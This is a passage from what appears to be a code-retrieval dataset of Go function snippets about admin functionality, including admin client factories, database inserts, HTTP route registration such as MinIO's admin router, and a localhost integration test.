{\n\tswitch adminClientType {\n\tcase types.Kafka:\n\t\treturn kafka.NewAdminClient(ctx, brokers, config)\n\tcase types.EventHub:\n\t\treturn eventhub.NewAdminClient(ctx, config) // Config Must Contain EventHub Namespace ConnectionString In Net.SASL.Password Field !\n\tcase types.Custom:\n\t\treturn custom.NewAdminClient(ctx)\n\tcase types.Unknown:\n\t\treturn nil, fmt.Errorf(\"received unknown AdminClientType\") // Should Never Happen But...\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"received unsupported AdminClientType of %d\", adminClientType)\n\t}\n}", "func (adminrepo *AdminRepo) CreateAdmin(admin *entity.Admin) (*entity.Admin, error) {\n\tinsertOneResult, era := adminrepo.DB.Collection(entity.ADMIN).InsertOne(context.TODO(), admin)\n\tif era != nil {\n\t\treturn admin, era\n\t}\n\tresult := Helper.ObjectIDFromInsertResult(insertOneResult)\n\tif result != \"\" {\n\t\tadmin.ID = result\n\t}\n\treturn admin, nil\n}", "func NewSysAdmin(name, jsonmessage string) *SysAdmin {\n\treturn &SysAdmin{\n\t\tName: name,\n\t\tValue: postgres.Jsonb{\n\t\t\tRawMessage: json.RawMessage(jsonmessage),\n\t\t},\n\t}\n}", "func MountAdminController(service *goa.Service, ctrl AdminController) {\n\tinitService(service)\n\tvar h goa.Handler\n\tservice.Mux.Handle(\"OPTIONS\", \"/admin/councillor\", ctrl.MuxHandler(\"preflight\", handleAdminOrigin(cors.HandlePreflight()), nil))\n\n\th = func(ctx context.Context, rw http.ResponseWriter, req *http.Request) error {\n\t\t// Check if there was an error loading the request\n\t\tif err := goa.ContextError(ctx); err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// Build the context\n\t\trctx, err := NewCreateCouncillorAdminContext(ctx, service)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn ctrl.CreateCouncillor(rctx)\n\t}\n\th = handleAdminOrigin(h)\n\th = handleSecurity(\"jwt\", h, \"admin:access\")\n\tservice.Mux.Handle(\"POST\", \"/admin/councillor\", ctrl.MuxHandler(\"CreateCouncillor\", h, nil))\n\tservice.LogInfo(\"mount\", \"ctrl\", \"Admin\", \"action\", \"CreateCouncillor\", \"route\", \"POST /admin/councillor\", \"security\", \"jwt\")\n}", "func (ct *CompanyTestSuite) TestCreateByAdmin(c *C) {\n\ttoken := getTestDefaultAuthToken()\n\n\temail := fmt.Sprintf(\"test_%[email protected]\", time.Now().UnixNano())\n\n\t_, err := createTestUser(email, token, \"\", true)\n\tc.Assert(err, IsNil)\n\n\tcreatedUserToken := getTestLoginToken(fmt.Sprintf(`{\"email\":\"%s\", \"password\": \"12345\"}`, email))\n\n\t//try to create new company with credentials of admin company\n\tcompanyName := fmt.Sprintf(\"companyName_%v\", time.Now().UnixNano())\n\tcompany := grpc_gateway_company.Company{\n\t\tName: companyName,\n\t}\n\n\tuserTxt, _ := json.Marshal(company)\n\treq, err := http.NewRequest(\"POST\", \"http://127.0.0.1:8080/v1/company\", bytes.NewReader(userTxt))\n\tc.Assert(err, IsNil)\n\n\treq.Header.Add(\"Authorization\", createdUserToken)\n\n\tclient := server.GetHTTPClient()\n\n\tresp, err := client.Do(req)\n\tdefer resp.Body.Close()\n\tc.Assert(err, IsNil)\n\n\tidResp := server.NewIDResponse()\n\terr = jsonpb.Unmarshal(resp.Body, idResp)\n\tc.Assert(err, IsNil)\n\n\tc.Assert(idResp.Meta.StatusCode, Equals, HttpStatusOK)\n\tc.Assert(idResp.Id, Not(Equals), \"\")\n}", "func (_Cakevault *CakevaultSession) Admin() (common.Address, error) {\n\treturn _Cakevault.Contract.Admin(&_Cakevault.CallOpts)\n}", "func MakeAdminAPI(\n\tmetricsName string, userAPI userapi.QueryAcccessTokenAPI,\n\tf func(*http.Request, *userapi.Device) util.JSONResponse,\n) http.Handler {\n\treturn MakeAuthAPI(metricsName, userAPI, func(req *http.Request, device *userapi.Device) util.JSONResponse {\n\t\tif device.AccountType != userapi.AccountTypeAdmin {\n\t\t\treturn util.JSONResponse{\n\t\t\t\tCode: http.StatusForbidden,\n\t\t\t\tJSON: spec.Forbidden(\"This API can only be used by admin users.\"),\n\t\t\t}\n\t\t}\n\t\treturn f(req, device)\n\t})\n}", "func (sec *DatabaseSecurity) AddAdmin(login string) error {\n\tif err := sec.db.GetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\tsec.UpdateAdmins(login, false)\n\tif err := sec.db.SetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RegisterAdminHandleFunc(pattern string, handler func(http.ResponseWriter, *http.Request)) {\n\tapiHandlerStore[pattern] = NewAPIHandler(handler)\n\tlog.StartLogger.Infof(\"[admin server] [register api] register a new api %s\", pattern)\n}", "func (newAdmin *NewAdmin) ToAdmin() (*Admin, error) {\n\n\t// Construct a Admin based on NewAdmin.\n\tadmin := &Admin{\n\t\tID: bson.NewObjectId(),\n\t\tUserName: newAdmin.UserName,\n\t\tFirstName: newAdmin.FirstName,\n\t\tLastName: newAdmin.LastName,\n\t}\n\n\t// Trim leading and trailing whitespace from an email address.\n\temail := strings.TrimSpace(newAdmin.Email)\n\n\t// Force all characters in the email to be lower-case.\n\temail = strings.ToLower(email)\n\n\t// Update Email field.\n\tadmin.Email = email\n\n\t// md5 hash the final email string.\n\th := md5.New()\n\tio.WriteString(h, email)\n\tresult := hex.EncodeToString(h.Sum(nil))\n\n\t// Set the PhotoURL field of the new Admin to\n\t// the Gravatar PhotoURL for the admin's email address.\n\tphotoURL := gravatarBasePhotoURL + result\n\tadmin.PhotoURL = photoURL\n\n\t// Call .SetPassword() to set the PassHash\n\t// field of the Admin to a hash of the NewAdmin.Password.\n\terr := admin.SetPassword(newAdmin.Password)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error setting password hash of the Admin: %v\", err)\n\t}\n\n\treturn admin, nil\n}", "func (r *ReconcileRethinkDBCluster) reconcileAdminService(cr *rethinkdbv1alpha1.RethinkDBCluster) error {\n\tfound := &corev1.Service{}\n\tname := fmt.Sprintf(\"%s-%s\", cr.ObjectMeta.Name, RethinkDBAdminKey)\n\n\terr := r.client.Get(context.TODO(), types.NamespacedName{Name: name, Namespace: cr.Namespace}, found)\n\tif err != nil && errors.IsNotFound(err) {\n\t\tif !cr.Spec.WebAdminEnabled {\n\t\t\t// Admin not enabled, do not create service\n\t\t\treturn nil\n\t\t}\n\n\t\tlog.Info(\"creating new service\", \"service\", name)\n\t\tsvc := newAdminService(cr)\n\n\t\t// Set RethinkDBCluster instance as the owner and controller\n\t\tif err = controllerutil.SetControllerReference(cr, svc, r.scheme); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Create the Service and return\n\t\treturn r.client.Create(context.TODO(), svc)\n\t} else if err != nil {\n\t\treturn err\n\t}\n\n\t// Service exists, verify that it should...\n\tif !cr.Spec.WebAdminEnabled {\n\t\tlog.Info(\"removing existing service\", \"service\", name)\n\t\treturn r.client.Delete(context.TODO(), found)\n\t}\n\n\tlog.Info(\"service exists\", \"service\", found.Name)\n\treturn nil\n}", "func registerAdminRouter(router *mux.Router, enableConfigOps bool) {\n\n\tadminAPI := adminAPIHandlers{}\n\t// Admin router\n\tadminRouter := router.PathPrefix(adminPathPrefix).Subrouter()\n\n\t/// Service operations\n\n\tadminVersions := []string{\n\t\tadminAPIVersionPrefix,\n\t}\n\n\tgz := func(h http.HandlerFunc) http.HandlerFunc {\n\t\treturn h\n\t}\n\n\twrapper, err := gzhttp.NewWrapper(gzhttp.MinSize(1000), gzhttp.CompressionLevel(gzip.BestSpeed))\n\tif err == nil {\n\t\tgz = func(h http.HandlerFunc) http.HandlerFunc {\n\t\t\treturn wrapper(h).(http.HandlerFunc)\n\t\t}\n\t}\n\tfor _, adminVersion := range adminVersions {\n\t\t// Restart and stop MinIO service.\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/service\").HandlerFunc(gz(httpTraceAll(adminAPI.ServiceHandler))).Queries(\"action\", \"{action:.*}\")\n\t\t// Update MinIO servers.\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/update\").HandlerFunc(gz(httpTraceAll(adminAPI.ServerUpdateHandler))).Queries(\"updateURL\", \"{updateURL:.*}\")\n\n\t\t// Info operations\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/info\").HandlerFunc(gz(httpTraceAll(adminAPI.ServerInfoHandler)))\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/inspect-data\").HandlerFunc(httpTraceHdrs(adminAPI.InspectDataHandler)).Queries(\"volume\", \"{volume:.*}\", \"file\", \"{file:.*}\")\n\n\t\t// StorageInfo operations\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/storageinfo\").HandlerFunc(gz(httpTraceAll(adminAPI.StorageInfoHandler)))\n\t\t// DataUsageInfo operations\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/datausageinfo\").HandlerFunc(gz(httpTraceAll(adminAPI.DataUsageInfoHandler)))\n\n\t\tif globalIsDistErasure || globalIsErasure {\n\t\t\t/// Heal operations\n\n\t\t\t// Heal processing endpoint.\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/heal/\").HandlerFunc(gz(httpTraceAll(adminAPI.HealHandler)))\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/heal/{bucket}\").HandlerFunc(gz(httpTraceAll(adminAPI.HealHandler)))\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/heal/{bucket}/{prefix:.*}\").HandlerFunc(gz(httpTraceAll(adminAPI.HealHandler)))\n\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/background-heal/status\").HandlerFunc(gz(httpTraceAll(adminAPI.BackgroundHealStatusHandler)))\n\n\t\t\t/// Health operations\n\n\t\t}\n\n\t\t// Profiling operations\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/profiling/start\").HandlerFunc(gz(httpTraceAll(adminAPI.StartProfilingHandler))).\n\t\t\tQueries(\"profilerType\", \"{profilerType:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/profiling/download\").HandlerFunc(gz(httpTraceAll(adminAPI.DownloadProfilingHandler)))\n\n\t\t// Config KV operations.\n\t\tif enableConfigOps {\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/get-config-kv\").HandlerFunc(gz(httpTraceHdrs(adminAPI.GetConfigKVHandler))).Queries(\"key\", \"{key:.*}\")\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion + \"/set-config-kv\").HandlerFunc(gz(httpTraceHdrs(adminAPI.SetConfigKVHandler)))\n\t\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion + \"/del-config-kv\").HandlerFunc(gz(httpTraceHdrs(adminAPI.DelConfigKVHandler)))\n\t\t}\n\n\t\t// Enable config help in all modes.\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/help-config-kv\").HandlerFunc(gz(httpTraceAll(adminAPI.HelpConfigKVHandler))).Queries(\"subSys\", \"{subSys:.*}\", \"key\", \"{key:.*}\")\n\n\t\t// Config KV history operations.\n\t\tif enableConfigOps {\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/list-config-history-kv\").HandlerFunc(gz(httpTraceAll(adminAPI.ListConfigHistoryKVHandler))).Queries(\"count\", \"{count:[0-9]+}\")\n\t\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion+\"/clear-config-history-kv\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ClearConfigHistoryKVHandler))).Queries(\"restoreId\", \"{restoreId:.*}\")\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/restore-config-history-kv\").HandlerFunc(gz(httpTraceHdrs(adminAPI.RestoreConfigHistoryKVHandler))).Queries(\"restoreId\", \"{restoreId:.*}\")\n\t\t}\n\n\t\t/// Config import/export bulk operations\n\t\tif enableConfigOps {\n\t\t\t// Get config\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/config\").HandlerFunc(gz(httpTraceHdrs(adminAPI.GetConfigHandler)))\n\t\t\t// Set config\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion + \"/config\").HandlerFunc(gz(httpTraceHdrs(adminAPI.SetConfigHandler)))\n\t\t}\n\n\t\t// -- IAM APIs --\n\n\t\t// Add policy IAM\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/add-canned-policy\").HandlerFunc(gz(httpTraceAll(adminAPI.AddCannedPolicy))).Queries(\"name\", \"{name:.*}\")\n\n\t\t// Add user IAM\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/accountinfo\").HandlerFunc(gz(httpTraceAll(adminAPI.AccountInfoHandler)))\n\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/add-user\").HandlerFunc(gz(httpTraceHdrs(adminAPI.AddUser))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/set-user-status\").HandlerFunc(gz(httpTraceHdrs(adminAPI.SetUserStatus))).Queries(\"accessKey\", \"{accessKey:.*}\").Queries(\"status\", \"{status:.*}\")\n\n\t\t// Service accounts ops\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion + \"/add-service-account\").HandlerFunc(gz(httpTraceHdrs(adminAPI.AddServiceAccount)))\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/update-service-account\").HandlerFunc(gz(httpTraceHdrs(adminAPI.UpdateServiceAccount))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/info-service-account\").HandlerFunc(gz(httpTraceHdrs(adminAPI.InfoServiceAccount))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/list-service-accounts\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListServiceAccounts)))\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion+\"/delete-service-account\").HandlerFunc(gz(httpTraceHdrs(adminAPI.DeleteServiceAccount))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\n\t\t// Info policy IAM latest\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/info-canned-policy\").HandlerFunc(gz(httpTraceHdrs(adminAPI.InfoCannedPolicy))).Queries(\"name\", \"{name:.*}\")\n\t\t// List policies latest\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/list-canned-policies\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListBucketPolicies))).Queries(\"bucket\", \"{bucket:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/list-canned-policies\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListCannedPolicies)))\n\n\t\t// Remove policy IAM\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion+\"/remove-canned-policy\").HandlerFunc(gz(httpTraceHdrs(adminAPI.RemoveCannedPolicy))).Queries(\"name\", \"{name:.*}\")\n\n\t\t// Set user or group policy\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/set-user-or-group-policy\").\n\t\t\tHandlerFunc(gz(httpTraceHdrs(adminAPI.SetPolicyForUserOrGroup))).\n\t\t\tQueries(\"policyName\", \"{policyName:.*}\", \"userOrGroup\", \"{userOrGroup:.*}\", \"isGroup\", \"{isGroup:true|false}\")\n\n\t\t// Remove user IAM\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion+\"/remove-user\").HandlerFunc(gz(httpTraceHdrs(adminAPI.RemoveUser))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\n\t\t// List users\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/list-users\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListBucketUsers))).Queries(\"bucket\", \"{bucket:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/list-users\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListUsers)))\n\n\t\t// User info\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/user-info\").HandlerFunc(gz(httpTraceHdrs(adminAPI.GetUserInfo))).Queries(\"accessKey\", \"{accessKey:.*}\")\n\t\t// Add/Remove members from group\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion + \"/update-group-members\").HandlerFunc(gz(httpTraceHdrs(adminAPI.UpdateGroupMembers)))\n\n\t\t// Get Group\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/group\").HandlerFunc(gz(httpTraceHdrs(adminAPI.GetGroup))).Queries(\"group\", \"{group:.*}\")\n\n\t\t// List Groups\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/groups\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListGroups)))\n\n\t\t// Set Group Status\n\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/set-group-status\").HandlerFunc(gz(httpTraceHdrs(adminAPI.SetGroupStatus))).Queries(\"group\", \"{group:.*}\").Queries(\"status\", \"{status:.*}\")\n\n\t\tif globalIsDistErasure || globalIsErasure {\n\t\t\t// GetBucketQuotaConfig\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/get-bucket-quota\").HandlerFunc(\n\t\t\t\tgz(httpTraceHdrs(adminAPI.GetBucketQuotaConfigHandler))).Queries(\"bucket\", \"{bucket:.*}\")\n\t\t\t// PutBucketQuotaConfig\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/set-bucket-quota\").HandlerFunc(\n\t\t\t\tgz(httpTraceHdrs(adminAPI.PutBucketQuotaConfigHandler))).Queries(\"bucket\", \"{bucket:.*}\")\n\n\t\t\t// Bucket replication operations\n\t\t\t// GetBucketTargetHandler\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion+\"/list-remote-targets\").HandlerFunc(\n\t\t\t\tgz(httpTraceHdrs(adminAPI.ListRemoteTargetsHandler))).Queries(\"bucket\", \"{bucket:.*}\", \"type\", \"{type:.*}\")\n\t\t\t// SetRemoteTargetHandler\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion+\"/set-remote-target\").HandlerFunc(\n\t\t\t\tgz(httpTraceHdrs(adminAPI.SetRemoteTargetHandler))).Queries(\"bucket\", \"{bucket:.*}\")\n\t\t\t// RemoveRemoteTargetHandler\n\t\t\tadminRouter.Methods(http.MethodDelete).Path(adminVersion+\"/remove-remote-target\").HandlerFunc(\n\t\t\t\tgz(httpTraceHdrs(adminAPI.RemoveRemoteTargetHandler))).Queries(\"bucket\", \"{bucket:.*}\", \"arn\", \"{arn:.*}\")\n\n\t\t\t// Remote Tier management operations\n\t\t\tadminRouter.Methods(http.MethodPut).Path(adminVersion + \"/tier\").HandlerFunc(gz(httpTraceHdrs(adminAPI.AddTierHandler)))\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/tier/{tier}\").HandlerFunc(gz(httpTraceHdrs(adminAPI.EditTierHandler)))\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/tier\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ListTierHandler)))\n\t\t}\n\n\t\tif globalIsDistErasure {\n\t\t\t// Top locks\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/top/locks\").HandlerFunc(gz(httpTraceHdrs(adminAPI.TopLocksHandler)))\n\t\t\t// Force unlocks paths\n\t\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/force-unlock\").\n\t\t\t\tQueries(\"paths\", \"{paths:.*}\").HandlerFunc(gz(httpTraceHdrs(adminAPI.ForceUnlockHandler)))\n\t\t}\n\n\t\t// HTTP Trace\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/trace\").HandlerFunc(gz(adminAPI.TraceHandler))\n\n\t\t// Console Logs\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/log\").HandlerFunc(gz(httpTraceAll(adminAPI.ConsoleLogHandler)))\n\n\t\t// -- KMS APIs --\n\t\t//\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion + \"/kms/status\").HandlerFunc(gz(httpTraceAll(adminAPI.KMSStatusHandler)))\n\t\tadminRouter.Methods(http.MethodPost).Path(adminVersion+\"/kms/key/create\").HandlerFunc(gz(httpTraceAll(adminAPI.KMSCreateKeyHandler))).Queries(\"key-id\", \"{key-id:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/kms/key/status\").HandlerFunc(gz(httpTraceAll(adminAPI.KMSKeyStatusHandler)))\n\n\t\tif !globalIsGateway {\n\t\t\t// Keep obdinfo for backward compatibility with mc\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/obdinfo\").\n\t\t\t\tHandlerFunc(gz(httpTraceHdrs(adminAPI.HealthInfoHandler)))\n\t\t\t// -- Health API --\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/healthinfo\").\n\t\t\t\tHandlerFunc(gz(httpTraceHdrs(adminAPI.HealthInfoHandler)))\n\t\t\tadminRouter.Methods(http.MethodGet).Path(adminVersion + \"/bandwidth\").\n\t\t\t\tHandlerFunc(gz(httpTraceHdrs(adminAPI.BandwidthMonitorHandler)))\n\t\t}\n\t}\n\n\t// If none of the routes match add default error handler routes\n\tadminRouter.NotFoundHandler = httpTraceAll(errorResponseHandler)\n\tadminRouter.MethodNotAllowedHandler = httpTraceAll(methodNotAllowedHandler(\"Admin\"))\n}", "func newServer(u userService, a authService, p permissionService) *server {\n s := &server{\n router: http.NewServeMux(),\n userService: u,\n authService: a,\n permissionService: p,\n }\n\n log.Println(\"loading templates...\")\n err := s.loadTemplates()\n if err != nil {\n log.Fatal(err)\n }\n log.Println(\"templates loaded successfully\")\n\n log.Println(\"defining routes...\")\n s.routes()\n log.Println(\"routes defined successfully\")\n\n return s\n}", "func New(endpoint string, accessKeyID, secretAccessKey string, secure bool) (*AdminClient, error) {\n\tclnt, err := privateNew(endpoint, accessKeyID, secretAccessKey, secure)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn clnt, nil\n}", "func New(\n\tarmDeployer arm.Deployer,\n\tcosmosdbManager cosmosdb.Manager,\n) service.Module {\n\treturn &module{\n\t\tserviceManager: &serviceManager{\n\t\t\tarmDeployer: armDeployer,\n\t\t\tcosmosdbManager: cosmosdbManager,\n\t\t},\n\t}\n}", "func NewServiceForAdminUserInfo(repo Repository, jwt jwtService.Service) Service {\n\treturn &ServiceAdminUserInfo{\n\t\trepo: repo,\n\t\tjwt: jwt,\n\t}\n}", "func (m *sdt) Admin() string {\n\treturn m.adminField\n}", "func New(\n\tazureEnvironment azure.Environment,\n\tarmDeployer arm.Deployer,\n\tserversClient mysqlSDK.ServersClient,\n) service.Module {\n\treturn &module{\n\t\tserviceManager: &serviceManager{\n\t\t\tsqlDatabaseDNSSuffix: azureEnvironment.SQLDatabaseDNSSuffix,\n\t\t\tarmDeployer: armDeployer,\n\t\t\tserversClient: serversClient,\n\t\t},\n\t}\n}", "func (_Contract *ContractCaller) Admin(opts *bind.CallOpts) (common.Address, error) {\n\tvar (\n\t\tret0 = new(common.Address)\n\t)\n\tout := ret0\n\terr := _Contract.contract.Call(opts, out, \"admin\")\n\treturn *ret0, err\n}", "func Init(ctx context.Context, admins []User, store *storage.Conn) error {\n\tfor _, a := range admins {\n\t\tad, err := store.Admin.Query().Where(adminT.UsernameEQ(a.Username)).First(ctx)\n\t\tif err != nil {\n\t\t\t_, err := store.Admin.Create().\n\t\t\t\tSetID(xid.New().String()).\n\t\t\t\tSetName(a.Name).\n\t\t\t\tSetUsername(a.Username).\n\t\t\t\tSave(ctx)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"creating admin\")\n\t\t\t}\n\t\t} else {\n\t\t\tif ad.Name != a.Name {\n\t\t\t\t_, err := ad.Update().SetName(a.Name).Save(ctx)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Error().Msgf(\"could not update name for %s\", a.Username)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func registerAdminRouter(router *mux.Router, enableConfigOps, enableIAMOps bool) {\n\n\tadminAPI := adminAPIHandlers{}\n\t// Admin router\n\tadminRouter := router.PathPrefix(adminPathPrefix).Subrouter()\n\n\t/// Service operations\n\n\t// Restart and stop MinIO service.\n\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix+\"/service\").HandlerFunc(httpTraceAll(adminAPI.ServiceActionHandler)).Queries(\"action\", \"{action:.*}\")\n\t// Update MinIO servers.\n\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix+\"/update\").HandlerFunc(httpTraceAll(adminAPI.ServerUpdateHandler)).Queries(\"updateURL\", \"{updateURL:.*}\")\n\n\t// Info operations\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/info\").HandlerFunc(httpTraceAll(adminAPI.ServerInfoHandler))\n\t// Harware Info operations\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/hardware\").HandlerFunc(httpTraceAll(adminAPI.ServerHardwareInfoHandler)).Queries(\"hwType\", \"{hwType:.*}\")\n\n\t// StorageInfo operations\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/storageinfo\").HandlerFunc(httpTraceAll(adminAPI.StorageInfoHandler))\n\t// DataUsageInfo operations\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/datausageinfo\").HandlerFunc(httpTraceAll(adminAPI.DataUsageInfoHandler))\n\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/accountingusageinfo\").HandlerFunc(httpTraceAll(adminAPI.AccountingUsageInfoHandler))\n\n\tif globalIsDistXL || globalIsXL {\n\t\t/// Heal operations\n\n\t\t// Heal processing endpoint.\n\t\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix + \"/heal/\").HandlerFunc(httpTraceAll(adminAPI.HealHandler))\n\t\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix + \"/heal/{bucket}\").HandlerFunc(httpTraceAll(adminAPI.HealHandler))\n\t\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix + \"/heal/{bucket}/{prefix:.*}\").HandlerFunc(httpTraceAll(adminAPI.HealHandler))\n\n\t\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix + \"/background-heal/status\").HandlerFunc(httpTraceAll(adminAPI.BackgroundHealStatusHandler))\n\n\t\t/// Health operations\n\n\t}\n\t// Performance command - return performance details based on input type\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/performance\").HandlerFunc(httpTraceAll(adminAPI.PerfInfoHandler)).Queries(\"perfType\", \"{perfType:.*}\")\n\n\t// Profiling operations\n\tadminRouter.Methods(http.MethodPost).Path(adminAPIVersionPrefix+\"/profiling/start\").HandlerFunc(httpTraceAll(adminAPI.StartProfilingHandler)).\n\t\tQueries(\"profilerType\", \"{profilerType:.*}\")\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/profiling/download\").HandlerFunc(httpTraceAll(adminAPI.DownloadProfilingHandler))\n\n\t// Config KV operations.\n\tif enableConfigOps {\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/get-config-kv\").HandlerFunc(httpTraceHdrs(adminAPI.GetConfigKVHandler)).Queries(\"key\", \"{key:.*}\")\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix + \"/set-config-kv\").HandlerFunc(httpTraceHdrs(adminAPI.SetConfigKVHandler))\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminAPIVersionPrefix + \"/del-config-kv\").HandlerFunc(httpTraceHdrs(adminAPI.DelConfigKVHandler))\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/help-config-kv\").HandlerFunc(httpTraceAll(adminAPI.HelpConfigKVHandler)).Queries(\"subSys\", \"{subSys:.*}\", \"key\", \"{key:.*}\")\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/list-config-history-kv\").HandlerFunc(httpTraceAll(adminAPI.ListConfigHistoryKVHandler)).Queries(\"count\", \"{count:[0-9]+}\")\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminAPIVersionPrefix+\"/clear-config-history-kv\").HandlerFunc(httpTraceHdrs(adminAPI.ClearConfigHistoryKVHandler)).Queries(\"restoreId\", \"{restoreId:.*}\")\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/restore-config-history-kv\").HandlerFunc(httpTraceHdrs(adminAPI.RestoreConfigHistoryKVHandler)).Queries(\"restoreId\", \"{restoreId:.*}\")\n\t}\n\n\t/// Config operations\n\tif enableConfigOps {\n\t\t// Get config\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/config\").HandlerFunc(httpTraceHdrs(adminAPI.GetConfigHandler))\n\t\t// Set config\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix + \"/config\").HandlerFunc(httpTraceHdrs(adminAPI.SetConfigHandler))\n\t}\n\n\tif enableIAMOps {\n\t\t// -- IAM APIs --\n\n\t\t// Add policy IAM\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/add-canned-policy\").HandlerFunc(httpTraceHdrs(adminAPI.AddCannedPolicy)).Queries(\"name\",\n\t\t\t\"{name:.*}\")\n\n\t\t// Add user 